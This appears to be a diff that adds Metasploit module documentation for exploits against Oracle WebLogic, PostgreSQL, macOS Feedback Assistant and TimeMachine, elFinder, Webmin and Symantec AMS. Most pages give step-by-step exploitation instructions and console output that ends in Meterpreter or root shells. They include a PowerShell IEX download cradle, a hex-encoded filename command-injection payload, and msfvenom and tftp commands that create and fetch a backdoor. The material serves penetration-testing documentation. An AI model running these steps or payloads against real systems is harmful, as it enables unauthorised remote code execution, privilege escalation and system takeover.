+  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+
+## Demo
+
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit
+
+[*] Started reverse TCP handler on 172.16.135.1:4444 
+[*] Generating payload...
+[*] Sending payload...
+[*] Sending stage (179779 bytes) to 172.16.135.128
+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49266) at 2019-05-22 14:16:03 -0500
+
+meterpreter >
+```
@@ -0,0 +1,38 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.
+
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
+ 3. `set rhosts <rhost>`
+ 4. `set rport <srvport>`
+ 5. `exploit`
+
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit
+ 
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800
+
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+ ```
@@ -0,0 +1,52 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
+Note that successful exploitation will output the following warning to the admin server console:
+
+```
+<Mar 26, 2019 4:13:24 PM CDT> <Error> <RJVM> <BEA-000503> <Incoming message header or abbreviation processing failed
+ java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
+java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
+        at $Proxy57.entrySet(Unknown Source)
+        at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:327)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
+        Truncated. see log file for complete stacktrace
+```
+
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0.
+
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_rawobject`
+ 3. `set rhosts <rhost>`
+ 4. `set rport <srvport>`
+ 5. `exploit`
+
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit
+
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800
+ 
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+ ```
@@ -0,0 +1,51 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1 are vulnerable to a deserialization vulnerability (CVE 2017-3248) in the core Components subcomponent due to unsafe deserialization of Java objects by the RMI registry and produce a JRMP connection from the target, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1.
+
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_unicastref`
+ 3. `set srvhost <srvhost>`
+ 4. `set srvport <srvport>`
+ 5. `set rhosts <rhost>`
+ 6. `set rport <srvport>`
+ 7. `exploit`
+ 8. `sessions -i 1`
+
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvhost 192.168.192.136
+ srvhost => 192.168.192.136
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvport 8888
+ srvport => 8888
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
+ [*] Exploit running as background job 17.
+
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] 192.168.192.6:7001 - Sending payload to client: 192.168.192.6
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 9 opened (192.168.192.136:4444 -> 192.168.192.6:49283) at 2018-12-14 11:45:44 -0800
+ [*] 192.168.192.6:7001 - Server stopped.
+ msf exploit(multi/misc/weblogic_deserialize_unicastref) > sessions -i 9
+ [*] Starting interaction with 9...
+
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+
+ ```
@@ -0,0 +1,245 @@
+This module attempts to create a new table, then execute system commands in the
+context of copying the command output into the table.
+
+This module should work on all Postgres systems running version 9.3 and above.
+
+## Vulnerable Application
+
+  Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
+  Set up the software and connect as the postgres superuser.
+  Use the techniques described in this blogpost to verify command execution:
+    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+
+## Verification Steps
+
+  You must be able to connect to the PostgreSQL database, and have a valid set of superuser
+  credentials, or a user in the 'pg_execute_server_program' group
+  
+  Exploiting Linux/OSX:
+
+    1. Start msfconsole
+    2. use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
+    3. set RHOST target.ip.add.ress
+    4. set payload cmd/unix/reverse_perl
+    5. set PASSWORD postgres
+    6. set USERNAME postgres
+    7. set DATABASE postgres
+    8. set LHOST my.ip.add.ress
+    9. set LHOST myport
+    10. exploit
+  
+  Exploiting Windows:
+
+    1. Start msfconsole
+    2. use exploit/multi/script/web_delivery
+    3. set target 2
+    4. set payload windows/meterpreter/reverse_tcp
+    5. set LHOST my.ip.add.ress
+    6. exploit -j
+    7. Copy powershell command, add \ to escape any single quotes
+    8. use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
+    9. set RHOST target.ip.add.ress
+    10. set COMMAND powershell... (Output from Step 7)
+    11. set PASSWORD postgres
+    12. set USERNAME postgres
+    13. set DATABASE postgres
+    14. exploit
+
+
+## Options
+
+  **TABLENAME**
+  
+  The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
+  one each time the exploit is run.
+  
+  **DUMP_TABLE_OUTPUT**
+
+  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for 
+  debugging if there are problems with a command being executed. 
+  
+  **DATABASE**
+  
+  Name of the database to connect to
+  
+  **USERNAME**
+  
+  A valid username that allows access to the database
+  
+  **PASSWORD**
+  
+  A valid password that allows access to the database
+  
+## Scenarios
+
+### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
+
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres
+    DATABASE => postgres
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres
+    USERNAME => postgres
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres
+    PASSWORD => postgres
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl
+    payload => cmd/unix/reverse_perl
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18
+    LHOST => 192.168.0.18
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25
+    RHOSTS => 192.168.0.25
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
+
+    Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
+
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       COMMAND                     no        Send a custom command instead of a payload, use with powershell web delivery against windows
+       DATABASE   postgres         yes       The database to authenticate against
+       PASSWORD   postgres         no        The password for the specified username. Leave blank for a random password.
+       RHOSTS     192.168.0.25     yes       The target address range or CIDR identifier
+       RPORT      5432             yes       The target port (TCP)
+       TABLENAME  msftesttable     yes       A table name that doesnt exist(To avoid deletion)
+       USERNAME   postgres         yes       The username to authenticate as
+
+
+    Payload options (cmd/unix/reverse_perl):
+
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  192.168.0.18     yes       The listen address (an interface may be specified)
+       LPORT  4456             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       0   Automatic
+   
+     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
+
+    [*] Started reverse TCP handler on 192.168.0.18:4456
+    [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit
+    [*] 192.168.0.25:5432 - Exploiting...
+    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully
+    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable created successfully
+    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable copied successfully(valid syntax/command)
+    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully(Cleaned)
+    [*] 192.168.0.25:5432 - Exploit Succeeded
+    [*] Command shell session 2 opened (192.168.0.18:4456 -> 192.168.0.25:51784) at 2019-03-24 18:07:11 +0000
+
+    whoami
+    postgres
+    uname -a
+    Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+    /usr/lib/postgresql/11/bin/postgres -V
+    postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
+   
+### Exploiting PostgreSQL 10.7 on Windows 10
+
+    
+    msf5 exploit(multi/script/web_delivery) > set target 2
+    target => 2
+    msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+    msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.0.18
+    LHOST => 192.168.0.18
+    msf5 exploit(multi/script/web_delivery) > show options
+
+    Module options (exploit/multi/script/web_delivery):
+
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+       SRVPORT  8080             yes       The local port to listen on.
+       SSL      false            no        Negotiate SSL for incoming connections
+       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+       URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+    Payload options (windows/meterpreter/reverse_tcp):
+
+       Name      Current Setting  Required  Description
+       ----      ---------------  --------  -----------
+       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+       LHOST     192.168.0.18     yes       The listen address (an interface may be specified)
+       LPORT     4444             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       2   PSH
+
+
+    msf5 exploit(multi/script/web_delivery) > exploit -j
+    [*] Exploit running as background job 0.
+    [*] Exploit completed, but no session was created.
+
+    [*] Started reverse TCP handler on 192.168.0.18:4444
+    [*] Using URL: http://0.0.0.0:8080/pUDD5sy8vTTD
+    [*] Local IP: http://192.168.0.18:8080/pUDD5sy8vTTD
+    [*] Server started.
+    [*] Run the following command on the target machine:
+    msf5 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD');
+
+    msf5 exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres
+    DATABASE => postgres
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24
+    RHOSTS => 192.168.0.24
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
+
+    Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
+
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       COMMAND                     no        Send a custom command instead of a payload, use with powershell web delivery against windows
+       DATABASE   postgres         yes       The database to authenticate against
+       PASSWORD   postgres         no        The password for the specified username. Leave blank for a random password.
+       RHOSTS     192.168.0.24     yes       The target address range or CIDR identifier
+       RPORT      5432             yes       The target port (TCP)
+       TABLENAME  msftesttable     yes       A table name that doesnt exist(To avoid deletion)
+       USERNAME   postgres         yes       The username to authenticate as
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       0   Automatic
+
+    
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\');
+    COMMAND => powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD')
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
+
+    [*] Started reverse TCP double handler on 192.168.0.18:4456
+    [*] 192.168.0.24:5432 - 192.168.0.24:5432 - PostgreSQL 10.7, compiled by Visual C++ build 1800, 32-bit
+    [*] 192.168.0.24:5432 - Exploiting...
+    [+] 192.168.0.24:5432 - 192.168.0.24:5432 - msftesttable dropped successfully
+    [+] 192.168.0.24:5432 - 192.168.0.24:5432 - msftesttable created successfully
+    [*] 192.168.0.24     web_delivery - Delivering Payload
+    [!] 192.168.0.24:5432 - 192.168.0.24:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(''http://192.168.0.18:8080/pUDD5sy8vTTD'');';
+    [*] 192.168.0.24:5432 - Exploit Failed
+    [*] Exploit completed, but no session was created.
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >
+    [*] Sending stage (179779 bytes) to 192.168.0.24
+    [*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.24:50154) at 2019-03-24 17:40:59 +0000
+
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions
+
+    Active sessions
+    ===============
+
+      Id  Name  Type                     Information                                     Connection
+      --  ----  ----                     -----------                                     ----------
+      1         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ DESKTOP-BHTT8OP  192.168.0.18:4444 -> 192.168.0.24:50154 (192.168.0.24)
+
+    msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1
+    [*] Starting interaction with 1...
+
+    meterpreter > getuid
+    Server username: NT AUTHORITY\NETWORK SERVICE
+    
+    
@@ -0,0 +1,33 @@
+## Background
+
+This module exploits a race condition in MacOS' Feedback Assistant, which would lead to root local
+privilege escalation.
+
+## Demo
+
+```
+msf5 exploit(osx/local/feedback_assistant_root) > check
+[*] The target appears to be vulnerable.
+msf5 exploit(osx/local/feedback_assistant_root) > run
+
+[*] Started reverse TCP handler on 172.16.135.1:5555 
+[*] Uploading file: '/tmp/.fjbgrf'
+[*] Uploading file: '/tmp/.fljhjbwe'
+[*] Executing exploit '/tmp/.fljhjbwe'
+[*] Transmitting first stager...(210 bytes)
+[*] Exploit result:
+2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
+2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
+    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
+}
+2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
+2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
+2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (808504 bytes) to 172.16.135.130
+[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter >
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label.
+
+The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root priviledges.
+
+## Verification Steps
+
+1. Get a session on a vulnerable system
+2. `use exploit/osx/local/timemachine_cmd_injection`
+3. `set lhost <IP>`
+4. `set lport <PORT>`
+5. `set session <session_id>`
+6. `run`
+
+## Scenarios
+
+### Mac OSX 10.14.3 (Mojave)
+
+```
+
+msf5 exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection
+msf5 exploit(osx/local/timemachine_cmd_injection) > exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.2:5555
+[*] Uploading file: '/tmp/qhjlknnmf'
+[*] Executing exploit '/tmp/qhjlknnmf'
+[*] Exploit result:
+2019-04-18 16:18:29.190 qhjlknnmf[51122:107119] creating dmg image
+2019-04-18 16:18:33.300 qhjlknnmf[51122:107119] mounting malformed disk
+2019-04-18 16:18:33.564 qhjlknnmf[51122:107119] sending XPC msg
+2019-04-18 16:18:33.564 qhjlknnmf[51122:107119] now wait a few minutes for the root command to run
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (808504 bytes) to 192.168.0.2
+[*] Meterpreter session 2 opened (192.168.0.2:5555 -> 192.168.0.2:34270) at 2019-04-18 16:20:02 +0800
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### MacOS 10.13.3 (High Sierra)
+
+```
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.86.1.31:4444
+[*] Uploading file: '/tmp/.xbdtqiynvb'
+[*] Executing exploit '/tmp/.xbdtqiynvb'
+[*] Exploit result:
+2019-06-29 12:26:29.052 .xbdtqiynvb[553:3447] creating dmg image
+2019-06-29 12:26:33.193 .xbdtqiynvb[553:3447] mounting malformed disk
+2019-06-29 12:26:33.533 .xbdtqiynvb[553:3447] sending XPC msg
+2019-06-29 12:26:33.534 .xbdtqiynvb[553:3447] now wait a few minutes for the root command to run
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (813560 bytes) to 192.168.86.1.32
+[*] Meterpreter session 3 opened (192.168.86.1.31:4444 -> 192.168.86.1.32:55888) at 2019-06-29 05:27:24 -0500
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
@@ -45,6 +45,11 @@ to work.

 Set this to a node ID on the target when using the `GET` method.

+**DUMP_OUTPUT**
+
+Enable this if you'd like to see HTTP responses, including command
+output. Defaults to `false` unless `cmd/unix/generic` is your payload.
+
 ## Usage

 ```
@@ -0,0 +1,90 @@
+## Description
+
+  This module exploits a command injection vulnerability in elFinder
+  versions prior to 2.1.48.
+
+  The PHP connector component allows unauthenticated users to upload
+  files and perform file modification operations, such as resizing and
+  rotation of an image. The file name of uploaded files is not validated,
+  allowing shell metacharacters.
+
+  When performing image operations on JPEG files, the filename is passed
+  to the `exiftran` utility without appropriate sanitization, causing
+  shell commands in the file name to be executed, resulting in remote
+  command injection as the web server user.
+
+  The PHP connector is not enabled by default.
+
+  The system must have `exiftran` installed and in `$PATH`.
+
+
+## Vulnerable Software
+
+  [elFinder](https://studio-42.github.io/elFinder/) is an open-source file
+  manager for web, written in JavaScript using jQuery and jQuery UI.
+
+  This module has been tested successfully on elFinder versions 2.1.47,
+  2.1.20 and 2.1.16 on Ubuntu.
+
+  Enable the PHP connector:
+
+  ```
+  mv php/connector.minimal.php-dist php/connector.minimal.php
+  ```
+
+  Install required `exiftran` utility:
+
+  ```
+  apt-get install exiftran
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection`
+  3. Do: `set rhosts <IP>`
+  4. Do: `run`
+  5. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to elFinder (default: `/elFinder/`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
+  rhosts => 172.16.191.253
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
+  targeturi => /elFinder-2.1.47
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
+  verbose => true
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
+  [*] 172.16.191.253:80 - The target service is running, but could not be validated.
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
+  [*] Triggering vulnerability via image rotation ...
+  [*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
+  [*] Sending stage (38247 bytes) to 172.16.191.253
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
+  [!] Tried to delete .kPUXqhMZ.php, unknown result
+  [*] No reply
+  [*] Removing uploaded file ...
+  [+] Deleted uploaded file
+  
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
+  Meterpreter : php/linux
+  meterpreter > 
+  ```
+
@@ -0,0 +1,63 @@
+## Description
+
+This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.
+
+## Vulnerable Application
+
+This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)
+
+## Options
+
+**GUESSUPLOAD**
+
+Use default installation path `/usr/share/webmin/`
+
+## Verification Steps
+
+1. `use exploit/unix/webapp/webmin_upload_exec`
+2. `set rhosts <rhost>`
+3. `set username <username>`
+4. `set password <password>`
+5. `exploit`
+
+## Scenarios
+
+### Tested Webmin 1.900 on Ubuntu 18.04 x64
+
+```
+msf5 > use exploit/unix/webapp/webmin_upload_exec
+msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
+rhosts => 172.22.222.154
+msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
+username => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
+password => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[-] Failed to determine webmin share directory
+[-] Set GUESSUPLOAD to attempt upload to a default location
+[*] Exploit completed, but no session was created.
+msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
+guessupload => true
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[!] Could not determine upload directory. Using /usr/share/webmin/
+[+] File gxvgsiji.cgi was successfully uploaded.
+[*] Attempting to execute the payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
+[+] Deleted gxvgsiji.cgi
+
+uname -a 
+Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+whoami
+root
+exit
+```
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+  This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution.  The payload is uploaded via TFTP
+  and then executed on the system.
+  This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/antivirus/ams_hndlrsvc`
+  4. Do: `set rhost`
+  5. Do: `exploit`
+  6. You should get a shell.
+
+## Options
+
+  **CMD**
+
+  Optional command line to run instead of attempting to directly inject a payload
+
+  **RPORT**
+
+  The port the service is running on.  Default is 38292.
+
+## Scenarios
+
+### Manual Upload and Execute
+
+If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.
+
+1. start atftpd: `atftpd --daemon --port=69 /tftpboot/`
+2. create payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe`
+3. start metasploit
+4. start a multihandler
+5. load the module: `use exploit/windows/antivirus/ams_hndlrsvc`
+6. use ams: `set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'`
+7. run
+8. use ams: `set cmd 'backdoor.exe'`
+9. run
+
+  ```
+root@kali:~/metasploit-framework# ./msfconsole 
+
+msf > ifconfig
+[*] exec: ifconfig
+
+eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+        inet 1.1.1.1  netmask 255.255.255.0  broadcast 192.168.3.255
+        inet6 fe80::20c:29ff:fef9:62a1  prefixlen 64  scopeid 0x20<link>
+        ether 00:0c:29:f9:1f:a1  txqueuelen 1000  (Ethernet)
+        RX packets 70933  bytes 39287343 (37.4 MiB)
+        RX errors 0  dropped 0  overruns 0  frame 0
+        TX packets 11688  bytes 3788654 (3.6 MiB)
+        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
